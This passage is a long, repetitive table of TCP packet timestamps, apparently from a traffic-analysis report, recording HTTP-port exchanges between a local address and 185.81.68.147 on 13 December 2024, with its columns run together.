                                                              Dec 13, 2024 07:47:45.860764027 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860790968 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860960007 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.860990047 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861012936 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861044884 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861071110 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861107111 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861129045 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861157894 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861179113 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861207008 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861228943 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861378908 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861402035 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861421108 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861449003 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861469984 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861496925 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861532927 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861605883 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861627102 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861663103 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861726046 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861754894 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861776114 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861804962 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861865997 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861898899 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861917019 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861947060 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861965895 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.861991882 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862011909 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862041950 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862062931 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862091064 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862263918 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862293959 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862317085 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862343073 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862364054 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862390041 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862410069 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862437963 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862457991 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862524033 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862554073 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862581968 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862607956 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862638950 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862731934 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862767935 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862788916 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862823963 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862838030 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862904072 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862937927 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.862957954 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.905642986 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.905791044 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.905802011 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.905827999 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.906008959 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.906059027 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.906068087 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.906116009 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.906126022 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.906502962 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.906538010 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.906555891 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.906636000 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.906673908 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.906682968 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.906692028 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.906799078 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.907134056 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.907154083 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.907232046 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.907241106 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.907248974 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.907259941 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.907291889 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.907300949 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.907861948 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.907912016 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.907923937 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.908009052 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.908045053 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.908054113 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.908061981 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.908082008 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.908091068 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.908716917 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.908781052 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.908791065 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.908837080 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.908878088 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.908951998 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.908962965 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.908992052 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909002066 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909010887 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909019947 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909053087 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909063101 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909085989 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909102917 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909154892 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909679890 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909689903 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909714937 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909790039 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909799099 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909806967 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909846067 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909853935 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909857988 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909862041 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909889936 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909898043 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909950018 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909960032 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909969091 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909981012 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.909991026 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910023928 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910032988 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910042048 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910049915 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910119057 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910388947 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910397053 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910404921 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910423040 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910432100 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910478115 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910486937 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910496950 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910531044 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910577059 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910609961 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910670042 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910679102 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910686970 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910702944 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910716057 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910726070 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.910734892 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911039114 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911092043 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911102057 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911108971 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911171913 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911180973 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911189079 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911200047 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911250114 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911267996 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911277056 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911292076 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911303043 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911310911 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911521912 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911530972 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911541939 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911550999 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911653042 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.911662102 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025610924 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025624990 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025635004 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025672913 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025686026 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025696039 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025772095 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025782108 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025789976 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025799036 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025808096 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025818110 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025827885 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025942087 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025964975 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025974035 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025986910 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.025995970 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026000023 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026407003 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026415110 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026423931 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026432991 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026443958 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026518106 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026526928 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026534081 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026541948 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026688099 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026695967 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026704073 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026812077 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026820898 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026832104 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026851892 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.026953936 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027136087 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027265072 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027275085 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027282953 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027292013 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027297020 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027390957 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027400970 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027409077 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027417898 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027429104 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027437925 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027540922 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027550936 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027717113 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.027725935 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028009892 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028018951 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028027058 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028036118 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028044939 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028137922 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028146982 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028155088 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028157949 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028167963 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028280973 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028290033 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028296947 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028307915 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028429985 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028439045 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028446913 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028595924 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028938055 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.028949022 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029043913 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029053926 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029062033 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029072046 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029083014 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029093981 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029161930 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029170990 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029177904 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029186010 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029196978 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029206038 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029329062 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029336929 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029476881 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029799938 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029808998 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029817104 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029834986 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029936075 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029944897 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.029953003 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030078888 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030087948 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030097008 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030106068 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030114889 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030227900 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030236006 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030244112 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030531883 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030541897 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030549049 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030558109 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030675888 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030684948 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030693054 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030702114 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030709982 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030719042 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030744076 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030752897 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030762911 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030848980 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030859947 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030868053 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030889988 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030899048 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030908108 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.030916929 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031012058 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031019926 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031028986 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031151056 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031160116 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031171083 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031179905 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031284094 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031291962 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031301022 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031311035 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031325102 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031429052 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031436920 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031445980 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031455040 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031734943 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031744003 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031752110 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031760931 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031769991 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031779051 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031900883 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031910896 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031919956 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031929016 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031936884 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031945944 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.031949997 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.032430887 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.032439947 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.032449961 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.032460928 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.032470942 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.032479048 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.032488108 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.032496929 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.032740116 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.032748938 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.032757044 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.032764912 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.032895088 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.032905102 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.033036947 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.033046007 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.033052921 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.033061028 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.033075094 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.033157110 CET8049775185.81.68.147192.168.2.4
